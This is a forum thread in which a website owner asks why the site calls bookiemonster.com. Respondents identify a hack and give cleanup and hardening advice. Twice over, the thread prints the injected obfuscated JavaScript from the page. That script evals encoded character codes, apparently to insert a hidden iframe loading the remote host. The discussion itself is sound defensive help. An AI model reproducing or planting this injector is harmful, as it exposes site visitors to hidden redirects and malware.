My site, http://moremariners.com is making a request to http://bookiemonster.com/ads.php (which isnt even a real page), causing it to redirect to the page on mobile browsers. You can see that the request is made on a PC, too, and if you inspect with Google Chrome, you can see the GET request for it. However, none of my files include a get request to the host.
How do I rid myself of this garbage?
Note the very end of your index.html file:
</html><script>aa=([].slice+'hjkbghkj').substr(2-1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss=new String();s=String;12-function(){e=eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n=["4.5k4.5k52.5k51k16k20k50k...
Your site has been hacked.
Whether or not someone here will go to the effort of decoding what this JavaScript does, what HTML it loads, etc. (which I would find interesting reading), the point is that your site has either insecure configurations or code with vulnerabilities.
The safest way forward is to wipe the machine. (Really. Rootkits are pretty incredible things these days. Someone else may have better control of your machine than you do.) Then re-install your CMS using the latest released and supported version. Then re-install your data, dumped from a known good data source. (You do have off-line backups of your data, right?) Make sure your data is clean and problem-free before loading it in your new instance. Make sure you configure your access controls as tight as possible, so that future attacks are more difficult. Consider also deploying a mandatory access control tool such as AppArmor, SELinux, TOMOYO, or SMACK. (I've been an AppArmor team member for over a decade now; it's my recommendation for most users but one of the other tools may be a better fit for you or your organization.)
Sounds like a malicious program infected ur system
I've used Hitman Pro, a cloud based anti virus and malware program that will clear most infections like this - for free for 30 days too...
Search google and download it. V 3.5 I think
Jonah
Your page ends up with two frames in it, that both refer to bookiemonster for ads.
You have this suspicious looking code at the end of your page that appears to be some sort of javascript that is trying to obscure what it's doing. If this isn't something you put there on purpose, then your site or page may have been hacked. I'd suggest removing this from the end of your page and then it's probably time for a thorough site security review. You probably will need to monitor that it doesn't get put back too.
<script>aa=([].slice+'hjkbghkj').substr(2-1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss=new String();s=String;12-function(){e=eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n=["4.5k4.5k52.5k51k16k20k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k20.5k61.5k4.5k4.5k4.5k52.5k51k57k48.5k54.5k50.5k57k20k20.5k29.5k4.5k4.5k62.5k16k50.5k54k57.5k50.5k16k61.5k4.5k4.5k4.5k50k55.5k49.5k58.5k54.5k50.5k55k58k23k59.5k57k52.5k58k50.5k20k17k30k52.5k51k57k48.5k54.5k50.5k16k57.5k57k49.5k30.5k19.5k52k58k58k56k29k23.5k23.5k49k55.5k55.5k53.5k52.5k50.5k54.5k55.5k55k57.5k58k50.5k57k23k49.5k55.5k23k55k61k23.5k48.5k50k57.5k23k56k52k56k19.5k16k59.5k52.5k50k58k52k30.5k19.5k24.5k24k19.5k16k52k50.5k52.5k51.5k52k58k30.5k19.5k24.5k24k19.5k16k57.5k58k60.5k54k50.5k30.5k19.5k59k52.5k57.5k52.5k49k52.5k54k52.5k58k60.5k29k52k52.5k50k50k50.5k55k29.5k56k55.5k57.5k52.5k58k52.5k55.5k55k29k48.5k49k57.5k55.5k54k58.5k58k50.5k29.5k54k50.5k51k58k29k24k29.5k58k55.5k56k29k24k29.5k19.5k31k30k23.5k52.5k51k57k48.5k54.5k50.5k31k17k20.5k29.5k4.5k4.5k62.5k4.5k4.5k51k58.5k55k49.5k58k52.5k55.5k55k16k52.5k51k57k48.5k54.5k50.5k57k20k20.5k61.5k4.5k4.5k4.5k59k48.5k57k16k51k16k30.5k16k50k55.5k49.5k58.5k54.5k50.5k55k58k23k49.5k57k50.5k48.5k58k50.5k34.5k54k50.5k54.5k50.5k55k58k20k19.5k52.5k51k57k48.5k54.5k50.5k19.5k20.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k57.5k57k49.5k19.5k22k19.5k52k58k58k56k29k23.5k23.5k49k55.5k55.5k53.5k52.5k50.5k54.5k55.5k55k57.5k58k50.5k57k23k49.5k55.5k23k55k61k23.5k48.5k50k57.5k23k56k52k56k19.5k20.5k29.5k51k23k57.5k58k60.5k54k50.5k23k59k52.5k57.5k52.5k49k52.5k54k52.5k58k60.5k30.5k19.5k52k52.5k50k50k50.5k55k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k56k55.5k57.5k52.5k58k52.5k55.5k55k30.5k19.5k48.5k49k57.5k55.5k54k58.5k58k50.5k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k54k50.5k51k58k30.5k19.5k24k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k58k55.5k56k30.5k19.5k24k19.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k59.5k52.5k50k58k52k19.5k22k19.5k24.5k24k19.5k20.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k52k50.5k52.5k51.5k52k58k19.5k22k19.5k24.5k24k19.5k20.5k29.5k4.5k4.5k4.5k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k23k48.5k56k56k50.5k55k50k33.5k52k52.5k54k50k20k51k20.5k29.5k4.5k4.5k62.5"];n=n[0].split(t);for(i=0;n.length-i>0;i++)ss+=s[f](-h*n[i]);f=ss;e(f);</script><script>aa=([].slice+'hjkbghkj').substr(2-1,4);if((aa=="func")||(aa=="unct"))aa=(document['createDocumentFragm'+'e'+'n'+'t']+'evweds').substr(2-1,4);if((aa=="func")||(aa=="unct")){ss=new String();s=String;12-function(){e=eval;f='fromCharCode';}();t='k';}ddd=new Date();d2=new Date(ddd.valueOf()-2);h=(ddd-d2)*-1;n=["4.5k4.5k52.5k51k16k20k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k20.5k61.5k4.5k4.5k4.5k52.5k51k57k48.5k54.5k50.5k57k20k20.5k29.5k4.5k4.5k62.5k16k50.5k54k57.5k50.5k16k61.5k4.5k4.5k4.5k50k55.5k49.5k58.5k54.5k50.5k55k58k23k59.5k57k52.5k58k50.5k20k17k30k52.5k51k57k48.5k54.5k50.5k16k57.5k57k49.5k30.5k19.5k52k58k58k56k29k23.5k23.5k49k55.5k55.5k53.5k52.5k50.5k54.5k55.5k55k57.5k58k50.5k57k23k49.5k55.5k23k55k61k23.5k48.5k50k57.5k23k56k52k56k19.5k16k59.5k52.5k50k58k52k30.5k19.5k24.5k24k19.5k16k52k50.5k52.5k51.5k52k58k30.5k19.5k24.5k24k19.5k16k57.5k58k60.5k54k50.5k30.5k19.5k59k52.5k57.5k52.5k49k52.5k54k52.5k58k60.5k29k52k52.5k50k50k50.5k55k29.5k56k55.5k57.5k52.5k58k52.5k55.5k55k29k48.5k49k57.5k55.5k54k58.5k58k50.5k29.5k54k50.5k51k58k29k24k29.5k58k55.5k56k29k24k29.5k19.5k31k30k23.5k52.5k51k57k48.5k54.5k50.5k31k17k20.5k29.5k4.5k4.5k62.5k4.5k4.5k51k58.5k55k49.5k58k52.5k55.5k55k16k52.5k51k57k48.5k54.5k50.5k57k20k20.5k61.5k4.5k4.5k4.5k59k48.5k57k16k51k16k30.5k16k50k55.5k49.5k58.5k54.5k50.5k55k58k23k49.5k57k50.5k48.5k58k50.5k34.5k54k50.5k54.5k50.5k55k58k20k19.5k52.5k51k57k48.5k54.5k50.5k19.5k20.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k57.5k57k49.5k19.5k22k19.5k52k58k58k56k29k23.5k23.5k49k55.5k55.5k53.5k52.5k50.5k54.5k55.5k55k57.5k58k50.5k57k23k49.5k55.5k23k55k61k23.5k48.5k50k57.5k23k56k52k56k19.5k20.5k29.5k51k23k57.5k58k60.5k54k50.5k23k59k52.5k57.5k52.5k49k52.5k54k52.5k58k60.5k30.5k19.5k52k52.5k50k50k50.5k55k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k56k55.5k57.5k52.5k58k52.5k55.5k55k30.5k19.5k48.5k49k57.5k55.5k54k58.5k58k50.5k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k54k50.5k51k58k30.5k19.5k24k19.5k29.5k51k23k57.5k58k60.5k54k50.5k23k58k55.5k56k30.5k19.5k24k19.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k59.5k52.5k50k58k52k19.5k22k19.5k24.5k24k19.5k20.5k29.5k51k23k57.5k50.5k58k32.5k58k58k57k52.5k49k58.5k58k50.5k20k19.5k52k50.5k52.5k51.5k52k58k19.5k22k19.5k24.5k24k19.5k20.5k29.5k4.5k4.5k4.5k50k55.5k49.5k58.5k54.5k50.5k55k58k23k51.5k50.5k58k34.5k54k50.5k54.5k50.5k55k58k57.5k33k60.5k42k48.5k51.5k39k48.5k54.5k50.5k20k19.5k49k55.5k50k60.5k19.5k20.5k45.5k24k46.5k23k48.5k56k56k50.5k55k50k33.5k52k52.5k54k50k20k51k20.5k29.5k4.5k4.5k62.5"];n=n[0].split(t);for(i=0;n.length-i>0;i++)ss+=s[f](-h*n[i]);f=ss;e(f);</script>
